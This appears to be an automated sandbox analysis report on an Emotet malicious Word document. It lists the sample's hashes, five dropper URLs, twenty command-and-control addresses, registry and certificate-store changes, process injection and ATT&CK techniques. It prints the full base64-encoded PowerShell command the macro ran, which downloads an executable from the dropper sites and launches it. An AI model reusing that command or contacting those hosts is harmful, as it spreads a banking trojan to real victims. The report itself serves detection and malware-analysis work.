emotet | 6264e94597601ac38cf03e59970036714ef4047d46a6c16f2de4716a4aee449c

General

Target

6264e94597601ac38cf03e59970036714ef4047d46a6c16f2de4716a4aee449c.doc
Size

195KB
MD5

fe6e05be3fe8ebb8c8c817e1ac39fa20
SHA1

a045691187d8a525bf3c357352debe1dd7d9293f
SHA256

6264e94597601ac38cf03e59970036714ef4047d46a6c16f2de4716a4aee449c
SHA512

c155ded14cfc0e383ef5b9364ca244f8733a8be7b39e07129cc2c56b39d9f5b8f90d88c117748d335acb5c5ca7ebe4b8cc45aedfb73c4fbfc518ff40c068e255

Score

10^/10

discovery trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://aliyousefpoor.com/wp-admin/Gkt8B41139/

exe.dropper

http://www.szhealthshield.com/websiteguide/k82i/

exe.dropper

https://digitalcon7.net/wp-snapshots/0Wn/

exe.dropper

https://exam.ylsbmeirong.com/data/tjEyH973/

exe.dropper

http://abatiy.com/yaa/po0395/

Extracted

Family

emotet

C2

177.144.135.2:80

104.247.221.104:443

201.213.32.59:80

190.147.137.153:443

178.79.163.131:8080

190.17.195.202:80

212.71.237.140:8080

68.183.190.199:8080

12.162.84.2:8080

186.250.52.226:8080

181.129.96.162:8080

185.94.252.12:80

77.55.211.77:8080

177.72.13.80:80

70.32.115.157:8080

114.109.179.60:80

68.183.170.114:8080

5.196.35.138:7080

87.106.46.107:8080

190.163.1.31:8080

rsa_pubkey.plain

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1052 powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1052	powersheLL.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

933.exe

description	pid	process	target process
PID 1256 wrote to memory of 1856	1256	933.exe	eapphost.exe
PID 1256 wrote to memory of 1856	1256	933.exe	eapphost.exe
PID 1256 wrote to memory of 1856	1256	933.exe	eapphost.exe
PID 1256 wrote to memory of 1856	1256	933.exe	eapphost.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{F9485E1F-DCFD-4AF5-B7A8-A5DCBE8B4B52}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{F9485E1F-DCFD-4AF5-B7A8-A5DCBE8B4B52}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{F9485E1F-DCFD-4AF5-B7A8-A5DCBE8B4B52}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{F9485E1F-DCFD-4AF5-B7A8-A5DCBE8B4B52}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{F9485E1F-DCFD-4AF5-B7A8-A5DCBE8B4B52}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1072 WINWORD.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXE933.exeeapphost.exe

pid process

1072 WINWORD.EXE
1072 WINWORD.EXE
1256 933.exe
1256 933.exe
1856 eapphost.exe
1856 eapphost.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exeeapphost.exe

pid process

1052 powersheLL.exe
1052 powersheLL.exe
1856 eapphost.exe
1856 eapphost.exe
Executes dropped EXE 2 IoCs

Processes:

933.exeeapphost.exe

pid process

1256 933.exe
1856 eapphost.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
1072	WINWORD.EXE

pid	process
1072	WINWORD.EXE
1072	WINWORD.EXE
1256	933.exe
1256	933.exe
1856	eapphost.exe
1856	eapphost.exe

pid	process
1052	powersheLL.exe
1052	powersheLL.exe
1856	eapphost.exe
1856	eapphost.exe

pid	process
1256	933.exe
1856	eapphost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powersheLL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powersheLL.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powersheLL.exe

Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

5 1052 powersheLL.exe

flow	pid	process
5	1052	powersheLL.exe

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe933.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\msvcp120_clr0400\eapphost.exe	933.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1052 776 powersheLL.exe
Office loads VBA resources, possible macro or embedded object present

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1052	776	powersheLL.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6264e94597601ac38cf03e59970036714ef4047d46a6c16f2de4716a4aee449c.doc"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABoAGEAdQBoAHEAdQBhAGMAdgBvAGUAbQBuAGkAbwB2AGsAbwB1AHoAPQAnAGQAYQB3AHEAdQBpAG8AYgBkAGEAdQBjAGgAdgBpAGUAYgBxAHUAZQBhAGQAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAVQBSAEkAdABZAGAAUABSAGAATwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHcAaQBlAHAAeABlAGkAYwB3AGUAYQBnAGMAbwBvAGcAYgBpAGEAbABqAG8AcQB1ACAAPQAgACcAOQAzADMAJwA7ACQAdABlAGEAZwBzAGUAaQB2AG4AaQBvAHgAagBhAG8AcQB1AD0AJwBsAGUAbwBrAGcAbwB1AGoAagBlAGUAYgBiAGEAZQBoACcAOwAkAHAAdQB1AHIAdABoAGUAcwB5AGUAYQB5AHMAaQBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAZQBwAHgAZQBpAGMAdwBlAGEAZwBjAG8AbwBnAGIAaQBhAGwAagBvAHEAdQArACcALgBlAHgAZQAnADsAJABjAGEAdQBtAHQAbwBlAHEAdQBrAGEAYwBjAGgAaQBvAGgAZwBlAGUAcwBiAHUAbAA9ACcAZgBvAGkAcgBmAGEAbwB6AGMAbwB6AGgAaQBhAGwAcQB1AGEAdQBzACcAOwAkAHQAaABhAGkAdABrAGEAZQByAHoAdQB1AGYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBlAEIAQwBMAEkARQBOAFQAOwAkAHMAZQBhAG0AcQB1AG8AdQB3AGMAaABlAHUAYwBoAHgAYQB1AGcAegBlAGkAagA9ACcAaAB0AHQAcABzADoALwAvAGEAbABpAHkAbwB1AHMAZQBmAHAAbwBvAHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEcAawB0ADgAQgA0ADEAMQAzADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAHoAaABlAGEAbAB0AGgAcwBoAGkAZQBsAGQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUAZwB1AGkAZABlAC8AawA4ADIAaQAvACoAaAB0AHQAcABzADoALwAvAGQAaQBnAGkAdABhAGwAYwBvAG4ANwAuAG4AZQB0AC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwAwAFcAbgAvACoAaAB0AHQAcABzADoALwAvAGUAeABhAG0ALgB5AGwAcwBiAG0AZQBpAHIAbwBuAGcALgBjAG8AbQAvAGQAYQB0AGEALwB0AGoARQB5AEgAOQA3ADMALwAqAGgAdAB0AHAAOgAvAC8AYQBiAGEAdABpAHkALgBjAG8AbQAvAHkAYQBhAC8AcABvADAAMwA5ADUALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGQAYQBvAGYAcgBhAG8AdABwAGEAbwB0AHYAdQBhAHcAPQAnAHcAZQBhAHoAdABlAHUAZABjAGUAaQBnAGMAbwBlAHcAdABoAGUAaQB4AG0AZQB1AHcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAbwBpAG0AeABlAG8AbgBtAG8AYQB3ACAAaQBuACAAJABzAGUAYQBtAHEAdQBvAHUAdwBjAGgAZQB1AGMAaAB4AGEAdQBnAHoAZQBpAGoAKQB7AHQAcgB5AHsAJAB0AGgAYQBpAHQAawBhAGUAcgB6AHUAdQBmAC4AIgBEAGAATwB3AG4ATABgAG8AYQBkAGYASQBMAEUAIgAoACQAbABvAGkAbQB4AGUAbwBuAG0AbwBhAHcALAAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQA7ACQAcwBvAGkAbgB3AGEAegBtAGUAaQBrAGgAZQBvAHYAdABoAGEAdQBqAGYAbwBpAHgAPQAnAG0AYQBlAHIAZABvAHUAZwBsAG8AaQBtAGcAbwBhAHQAaABjAHUAdQBjACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQAuACIATABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANwA2ADMAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIAZQBhAHQARQAiACgAJABwAHUAdQByAHQAaABlAHMAeQBlAGEAeQBzAGkAbgApADsAJABiAGEAZQB3AD0AJwB5AG8AdAB3AGEAaQB2AG0AbwBvAGsAcwBhAG8AYwBoAHQAbwBpAGoAJwA7AGIAcgBlAGEAawA7ACQAYwBpAG8AcwBwAGkAbwBiAHEAdQBhAG8AcwBsAGUAaQB3AD0AJwBqAGEAZQBjAGgAZgB1AHUAYwBoAGoAaQBlAHkAegBhAGUAeQBwAGUAbwB6AHQAaABvAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AGUAZQBjAGwAaQBlAGcAPQAnAHgAdQBqACcA
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Modifies system certificate store
- Blacklisted process makes network request
- Drops file in System32 directory
- Process spawned unexpected child process
PID:1052

C:\Users\Admin\933.exe
C:\Users\Admin\933.exe
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:1256

C:\Windows\SysWOW64\msvcp120_clr0400\eapphost.exe
"C:\Windows\SysWOW64\msvcp120_clr0400\eapphost.exe"
2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\933.exe

Download Submit
C:\Users\Admin\933.exe

Download Submit
C:\Windows\SysWOW64\msvcp120_clr0400\eapphost.exe

Download Submit
memory/1072-2-0x00000000089B0000-0x00000000089B4000-memory.dmp

Filesize
16KB

Download
memory/1072-3-0x0000000006E90000-0x0000000007090000-memory.dmp

Filesize
2.0MB

Download
memory/1072-4-0x0000000006E90000-0x0000000007090000-memory.dmp

Filesize
2.0MB

Download
memory/1072-5-0x000000000B210000-0x000000000B214000-memory.dmp

Filesize
16KB

Download
memory/1072-6-0x000000000C290000-0x000000000C294000-memory.dmp

Filesize
16KB

Download
memory/1072-7-0x0000000006E90000-0x0000000007090000-memory.dmp

Filesize
2.0MB

Download
memory/1256-10-0x00000000003A0000-0x00000000003AC000-memory.dmp

Filesize
48KB

Download
memory/1856-11-0x0000000000000000-mapping.dmp

Download
memory/1856-13-0x0000000000260000-0x000000000026C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads